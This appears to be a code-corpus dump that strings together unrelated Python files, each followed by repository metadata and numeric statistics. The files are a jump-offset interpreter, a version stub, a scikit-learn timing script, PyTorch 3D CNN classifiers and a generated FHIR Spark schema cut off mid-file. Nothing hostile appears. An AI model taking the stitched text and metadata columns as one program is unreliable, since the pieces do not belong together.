memory[pc] += 1
steps += 1
pc += to_move
print('Part 2', steps)
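Since both passes share the same interpreter loop, a hedged refactor sketch (not part of the original solution) can parameterize the jump-update rule; it still expects the same input.txt to be present.
def run(memory, update):
    # Generic interpreter: follow jump offsets, mutating each visited offset by
    # update(offset), until the program counter leaves the memory.
    steps, pc = 0, 0
    while 0 <= pc < len(memory):
        jump = memory[pc]
        memory[pc] += update(jump)
        steps += 1
        pc += jump
    return steps

with open('input.txt', 'r') as f:
    memory = [int(a) for a in f]
print('Part 1', run(list(memory), lambda j: 1))
print('Part 2', run(list(memory), lambda j: -1 if j >= 3 else 1))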
| 18.392857
| 33
| 0.530097
| 90
| 515
| 2.977778
| 0.333333
| 0.11194
| 0.100746
| 0.119403
| 0.813433
| 0.813433
| 0.813433
| 0.813433
| 0.813433
| 0.813433
| 0
| 0.041209
| 0.293204
| 515
| 28
| 34
| 18.392857
| 0.695055
| 0.040777
| 0
| 0.761905
| 0
| 0
| 0.064777
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.095238
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adb5bb145930a01e11fef550e9c2112c5feb0231
| 46
|
py
|
Python
|
libsovereign/__init__.py
|
sousouindustries/python-libsovereign
|
c7176ab76c1ef0279c5344b772da03082db17c37
|
[
"BSD-4-Clause"
] | null | null | null |
libsovereign/__init__.py
|
sousouindustries/python-libsovereign
|
c7176ab76c1ef0279c5344b772da03082db17c37
|
[
"BSD-4-Clause"
] | null | null | null |
libsovereign/__init__.py
|
sousouindustries/python-libsovereign
|
c7176ab76c1ef0279c5344b772da03082db17c37
|
[
"BSD-4-Clause"
] | null | null | null |
def get_version():
return '1.0.0alpha1'
| 9.2
| 24
| 0.630435
| 7
| 46
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.217391
| 46
| 4
| 25
| 11.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
adcd7c53bf3c8d26833f30d251b03520da51b3bb
| 4,796
|
py
|
Python
|
CSCI381_Homework1/TestDataSets.py
|
Shashi717/MachineLearningProjects
|
447d1fb160dc1ceb1530933049c8d696a28b2b71
|
[
"MIT"
] | null | null | null |
CSCI381_Homework1/TestDataSets.py
|
Shashi717/MachineLearningProjects
|
447d1fb160dc1ceb1530933049c8d696a28b2b71
|
[
"MIT"
] | null | null | null |
CSCI381_Homework1/TestDataSets.py
|
Shashi717/MachineLearningProjects
|
447d1fb160dc1ceb1530933049c8d696a28b2b71
|
[
"MIT"
] | null | null | null |
# script to test your computation code
# do not change this file
from ComputeMatrices import compute_distance_naive, \
compute_distance_smart, compute_correlation_naive, \
compute_correlation_smart
import numpy as np
import time
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_digits
# an example code for testing
def main():
iris = load_iris()
breastcancer = load_breast_cancer()
digits = load_digits()
X = iris.data
Y = breastcancer.data
Z = digits.data
iris_loop_start = time.time()
distance_loop = compute_distance_naive(X)
iris_loop_end = time.time()
iris_cool_start = time.time()
distance_cool = compute_distance_smart(X)
iris_cool_end = time.time()
breastcancer_loop_start = time.time()
distance_loop = compute_distance_naive(Y)
breastcancer_loop_end = time.time()
breastcancer_cool_start = time.time()
distance_cool = compute_distance_smart(Y)
breastcancer_cool_end = time.time()
digits_loop_start = time.time()
distance_loop = compute_distance_naive(Z)
digits_loop_end = time.time()
digits_cool_start = time.time()
distance_cool = compute_distance_smart(Z)
digits_cool_end = time.time()
duration_loop_iris = iris_loop_end - iris_loop_start
duration_loop_bc = breastcancer_loop_end - breastcancer_loop_start
duration_loop_digits = digits_loop_end - digits_loop_start
duration_cool_iris = iris_cool_end - iris_cool_start
duration_cool_bc = breastcancer_cool_end - breastcancer_cool_start
duration_cool_digits = digits_cool_end - digits_cool_start
# data for plotting
n_groups = 3
loop_data = (duration_loop_iris, duration_loop_bc, duration_loop_digits)
cool_data = (duration_cool_iris, duration_cool_bc, duration_cool_digits)
# drawing the plot
fig, ax = plt.subplots()
index = np.arange(n_groups)
bar_width = 0.20
opacity = 0.70
rects1 = plt.bar(index, loop_data, bar_width,
alpha=opacity,
color='r',
label='loop')
rects2 = plt.bar(index + bar_width, cool_data, bar_width,
alpha=opacity,
color='b',
label='cool')
plt.xlabel('Data Set')
plt.ylabel('Compute Time - Distance')
plt.title('Compute-Time Comparison')
plt.xticks(index + bar_width, ('Iris', 'Breast Cancer', 'Digits'))
plt.legend()
plt.tight_layout()
plt.savefig('DistanceTimeComparison.pdf')
print "result is written to DistanceTimeComparison.pdf"
iris_loop_start = time.time()
distance_loop = compute_correlation_naive(X)
iris_loop_end = time.time()
iris_cool_start = time.time()
distance_cool = compute_correlation_smart(X)
iris_cool_end = time.time()
breastcancer_loop_start = time.time()
distance_loop = compute_correlation_naive(Y)
breastcancer_loop_end = time.time()
breastcancer_cool_start = time.time()
distance_cool = compute_correlation_smart(Y)
breastcancer_cool_end = time.time()
digits_loop_start = time.time()
distance_loop = compute_correlation_naive(Z)
digits_loop_end = time.time()
digits_cool_start = time.time()
distance_cool = compute_correlation_smart(Z)
digits_cool_end = time.time()
duration_loop_iris = iris_loop_end - iris_loop_start
duration_loop_bc = breastcancer_loop_end - breastcancer_loop_start
duration_loop_digits = digits_loop_end - digits_loop_start
duration_cool_iris = iris_cool_end - iris_cool_start
duration_cool_bc = breastcancer_cool_end - breastcancer_cool_start
duration_cool_digits = digits_cool_end - digits_cool_start
# data for plotting
n_groups = 3
loop_data = (duration_loop_iris, duration_loop_bc, duration_loop_digits)
cool_data = (duration_cool_iris, duration_cool_bc, duration_cool_digits)
# drawing the plot
fig, ax = plt.subplots()
index = np.arange(n_groups)
bar_width = 0.20
opacity = 0.70
rects1 = plt.bar(index, loop_data, bar_width,
alpha=opacity,
color='r',
label='loop')
rects2 = plt.bar(index + bar_width, cool_data, bar_width,
alpha=opacity,
color='b',
label='cool')
plt.xlabel('Data Set')
plt.ylabel('Compute Time - Correlation')
plt.title('Compute-Time Comparison')
plt.xticks(index + bar_width, ('Iris', 'Breast Cancer', 'Digits'))
plt.legend()
plt.tight_layout()
plt.savefig('CovarianceTimeComparison.pdf')
print "result is written to CovarianceTimeComparison.pdf"
if __name__ == "__main__": main()
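The compute_distance_smart and compute_correlation_smart functions imported above live in ComputeMatrices.py and are not shown. As a hedged sketch of what a vectorized pairwise Euclidean distance could look like (a common NumPy idiom, not necessarily the homework's actual implementation):
def pairwise_distance_vectorized(X):
    # Uses ||x_i - x_j||^2 = ||x_i||^2 + ||x_j||^2 - 2 * x_i . x_j to avoid Python loops.
    sq_norms = np.sum(X ** 2, axis=1)
    sq_dists = sq_norms[:, None] + sq_norms[None, :] - 2.0 * (X @ X.T)
    # Clip tiny negative values caused by floating-point round-off before the sqrt.
    return np.sqrt(np.maximum(sq_dists, 0.0))

# Sanity check against an explicit double loop on a small random matrix.
_X = np.random.rand(5, 3)
_naive = np.array([[np.linalg.norm(a - b) for a in _X] for b in _X])
assert np.allclose(pairwise_distance_vectorized(_X), _naive)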
| 33.075862
| 76
| 0.696414
| 618
| 4,796
| 5.035599
| 0.152104
| 0.061697
| 0.050129
| 0.080977
| 0.842866
| 0.81491
| 0.798843
| 0.798843
| 0.796272
| 0.736504
| 0
| 0.004806
| 0.219141
| 4,796
| 144
| 77
| 33.305556
| 0.826168
| 0.032944
| 0
| 0.684685
| 0
| 0
| 0.072354
| 0.023326
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.063063
| null | null | 0.018018
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc05f25d9cd17faa58186fa4646e181feccf83a1
| 6,153
|
py
|
Python
|
clinicadl/clinicadl/tools/deep_learning/models/image_level.py
|
ghisvail/AD-DL
|
c11d08c651b9bbefdab08ddbb83a684035583945
|
[
"MIT"
] | null | null | null |
clinicadl/clinicadl/tools/deep_learning/models/image_level.py
|
ghisvail/AD-DL
|
c11d08c651b9bbefdab08ddbb83a684035583945
|
[
"MIT"
] | null | null | null |
clinicadl/clinicadl/tools/deep_learning/models/image_level.py
|
ghisvail/AD-DL
|
c11d08c651b9bbefdab08ddbb83a684035583945
|
[
"MIT"
] | null | null | null |
# coding: utf8
from .modules import PadMaxPool3d, Flatten
import torch.nn as nn
import torch
"""
All the architectures are built here
"""
class Conv5_FC3(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Minimal preprocessing
"""
def __init__(self, dropout=0.5):
super(Conv5_FC3, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.classifier = nn.Sequential(
Flatten(),
nn.Dropout(p=dropout),
nn.Linear(128 * 6 * 7 * 6, 1300),
nn.ReLU(),
nn.Linear(1300, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 128, 6, 7, 6]
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
class VConv5_FC3(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Minimal preprocessing
"""
def __init__(self, dropout=0.5):
super(VConv5_FC3, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.fc_mu = nn.Sequential(
Flatten(),
nn.Linear(128 * 6 * 7 * 6, 1300)
)
self.fc_var = nn.Sequential(
Flatten(),
nn.Linear(128 * 6 * 7 * 6, 1300)
)
self.classifier = nn.Sequential(
nn.Linear(1300, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 128, 6, 7, 6]
self.variational = True
def forward(self, x):
x = self.features(x)
log_var = self.fc_var(x)
mu = self.fc_mu(x)
std = torch.exp(log_var / 2)
if self.training:
q = torch.distributions.Normal(mu, std)
z = q.rsample()
else:
z = mu
out = self.classifier(z)
return z, mu, std, out
class Conv5_FC3_mni(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Extensive preprocessing
"""
def __init__(self, dropout=0.5):
super(Conv5_FC3_mni, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.classifier = nn.Sequential(
Flatten(),
nn.Dropout(p=dropout),
nn.Linear(128 * 4 * 5 * 4, 1300),
nn.ReLU(),
nn.Linear(1300, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 128, 4, 5, 4]
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
class Conv6_FC3(nn.Module):
"""
Classifier for a binary classification task
Image level architecture used on Minimal preprocessing
"""
def __init__(self, dropout=0.5):
super(Conv6_FC3, self).__init__()
self.features = nn.Sequential(
nn.Conv3d(1, 8, 3, padding=1),
nn.BatchNorm3d(8),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(8, 16, 3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(16, 32, 3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(32, 64, 3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(64, 128, 3, padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
PadMaxPool3d(2, 2),
nn.Conv3d(128, 256, 3, padding=1),
nn.BatchNorm3d(256),
nn.ReLU(),
PadMaxPool3d(2, 2),
)
self.classifier = nn.Sequential(
Flatten(),
nn.Dropout(p=dropout),
nn.Linear(256 * 3 * 4 * 3, 1000),
nn.ReLU(),
nn.Linear(1000, 50),
nn.ReLU(),
nn.Linear(50, 2)
)
self.flattened_shape = [-1, 256, 3, 4, 3]
def forward(self, x):
x = self.features(x)
x = self.classifier(x)
return x
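A hedged usage sketch for the image-level classifiers above. The input size is an assumption: the hard-coded flattened_shape = [-1, 128, 6, 7, 6] is consistent with a 1 x 169 x 208 x 179 volume after five pad-and-halve poolings, which matches the "minimal preprocessing" the docstrings mention. It also assumes the surrounding clinicadl package (for PadMaxPool3d and Flatten) is importable.
if __name__ == "__main__":
    model = Conv5_FC3(dropout=0.5)
    # (batch, channel, depth, height, width); the spatial size is an assumption, see above.
    dummy = torch.randn(2, 1, 169, 208, 179)
    logits = model(dummy)
    print(logits.shape)  # expected: torch.Size([2, 2])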
| 23.044944
| 60
| 0.476353
| 719
| 6,153
| 4.004172
| 0.123783
| 0.058354
| 0.065648
| 0.080236
| 0.860368
| 0.852727
| 0.852727
| 0.848906
| 0.838833
| 0.838833
| 0
| 0.109125
| 0.390866
| 6,153
| 266
| 61
| 23.131579
| 0.659018
| 0.067447
| 0
| 0.761364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.017045
| 0
| 0.107955
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc1933a1a0c3c23473be0f6e4eeb7b7fd15a88cc
| 25,912
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/molecularsequence_quality.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/molecularsequence_quality.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/molecularsequence_quality.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class MolecularSequence_QualitySchema:
"""
Raw data describing a biological sequence.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = None,
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
use_date_for: Optional[List[str]] = None,
parent_path: Optional[str] = "",
) -> Union[StructType, DataType]:
"""
Raw data describing a biological sequence.
id: Unique id for the element within a resource (for internal references). This
may be any string value that does not contain spaces.
extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
modifierExtension: May be used to represent additional information that is not part of the basic
definition of the element and that modifies the understanding of the element
in which it is contained and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer can define an extension, there is a set of requirements that SHALL
be met as part of the definition of the extension. Applications processing a
resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
type: INDEL / SNP / Undefined variant.
standardSequence: Gold standard sequence used for comparing against.
start: Start position of the sequence. If the coordinate system is either 0-based or
1-based, then start position is inclusive.
end: End position of the sequence. If the coordinate system is 0-based then end is
exclusive and does not include the last position. If the coordinate system is
1-base, then end is inclusive and includes the last position.
score: The score of an experimentally derived feature such as a p-value ([SO:0001685]
(http://www.sequenceontology.org/browser/current_svn/term/SO:0001685)).
method: Which method is used to get sequence quality.
truthTP: True positives, from the perspective of the truth data, i.e. the number of
sites in the Truth Call Set for which there are paths through the Query Call
Set that are consistent with all of the alleles at this site, and for which
there is an accurate genotype call for the event.
queryTP: True positives, from the perspective of the query data, i.e. the number of
sites in the Query Call Set for which there are paths through the Truth Call
Set that are consistent with all of the alleles at this site, and for which
there is an accurate genotype call for the event.
truthFN: False negatives, i.e. the number of sites in the Truth Call Set for which
there is no path through the Query Call Set that is consistent with all of the
alleles at this site, or sites for which there is an inaccurate genotype call
for the event. Sites with correct variant but incorrect genotype are counted
here.
queryFP: False positives, i.e. the number of sites in the Query Call Set for which
there is no path through the Truth Call Set that is consistent with this site.
Sites with correct variant but incorrect genotype are counted here.
gtFP: The number of false positives where the non-REF alleles in the Truth and Query
Call Sets match (i.e. cases where the truth is 1/1 and the query is 0/1 or
similar).
precision: QUERY.TP / (QUERY.TP + QUERY.FP).
recall: TRUTH.TP / (TRUTH.TP + TRUTH.FN).
fScore: Harmonic mean of Recall and Precision, computed as: 2 * precision * recall /
(precision + recall).
roc: Receiver Operator Characteristic (ROC) Curve to give sensitivity/specificity
tradeoff.
"""
if extension_fields is None:
extension_fields = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
"valueReference",
"valueCodeableConcept",
"valueAddress",
]
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.r4.simple_types.integer import integerSchema
from spark_fhir_schemas.r4.complex_types.quantity import QuantitySchema
from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
from spark_fhir_schemas.r4.complex_types.molecularsequence_roc import (
MolecularSequence_RocSchema,
)
if (
max_recursion_limit
and nesting_list.count("MolecularSequence_Quality") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["MolecularSequence_Quality"]
my_parent_path = (
parent_path + ".molecularsequence_quality"
if parent_path
else "molecularsequence_quality"
)
schema = StructType(
[
# Unique id for the element within a resource (for internal references). This
# may be any string value that does not contain spaces.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the element. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the element and that modifies the understanding of the element
# in which it is contained and/or the understanding of the containing element's
# descendants. Usually modifier elements provide negation or qualification. To
# make the use of extensions safe and manageable, there is a strict set of
# governance applied to the definition and use of extensions. Though any
# implementer can define an extension, there is a set of requirements that SHALL
# be met as part of the definition of the extension. Applications processing a
# resource are required to check for modifier extensions.
#
# Modifier extensions SHALL NOT change the meaning of any elements on Resource
# or DomainResource (including cannot change the meaning of modifierExtension
# itself).
StructField(
"modifierExtension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# INDEL / SNP / Undefined variant.
StructField("type", StringType(), True),
# Gold standard sequence used for comparing against.
StructField(
"standardSequence",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Start position of the sequence. If the coordinate system is either 0-based or
# 1-based, then start position is inclusive.
StructField(
"start",
integerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".start",
),
True,
),
# End position of the sequence. If the coordinate system is 0-based then end is
# exclusive and does not include the last position. If the coordinate system is
# 1-base, then end is inclusive and includes the last position.
StructField(
"end",
integerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".end",
),
True,
),
# The score of an experimentally derived feature such as a p-value ([SO:0001685]
# (http://www.sequenceontology.org/browser/current_svn/term/SO:0001685)).
StructField(
"score",
QuantitySchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Which method is used to get sequence quality.
StructField(
"method",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# True positives, from the perspective of the truth data, i.e. the number of
# sites in the Truth Call Set for which there are paths through the Query Call
# Set that are consistent with all of the alleles at this site, and for which
# there is an accurate genotype call for the event.
StructField(
"truthTP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".truthtp",
),
True,
),
# True positives, from the perspective of the query data, i.e. the number of
# sites in the Query Call Set for which there are paths through the Truth Call
# Set that are consistent with all of the alleles at this site, and for which
# there is an accurate genotype call for the event.
StructField(
"queryTP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".querytp",
),
True,
),
# False negatives, i.e. the number of sites in the Truth Call Set for which
# there is no path through the Query Call Set that is consistent with all of the
# alleles at this site, or sites for which there is an inaccurate genotype call
# for the event. Sites with correct variant but incorrect genotype are counted
# here.
StructField(
"truthFN",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".truthfn",
),
True,
),
# False positives, i.e. the number of sites in the Query Call Set for which
# there is no path through the Truth Call Set that is consistent with this site.
# Sites with correct variant but incorrect genotype are counted here.
StructField(
"queryFP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".queryfp",
),
True,
),
# The number of false positives where the non-REF alleles in the Truth and Query
# Call Sets match (i.e. cases where the truth is 1/1 and the query is 0/1 or
# similar).
StructField(
"gtFP",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".gtfp",
),
True,
),
# QUERY.TP / (QUERY.TP + QUERY.FP).
StructField(
"precision",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".precision",
),
True,
),
# TRUTH.TP / (TRUTH.TP + TRUTH.FN).
StructField(
"recall",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".recall",
),
True,
),
# Harmonic mean of Recall and Precision, computed as: 2 * precision * recall /
# (precision + recall).
StructField(
"fScore",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".fscore",
),
True,
),
# Receiver Operator Characteristic (ROC) Curve to give sensitivity/specificity
# tradeoff.
StructField(
"roc",
MolecularSequence_RocSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
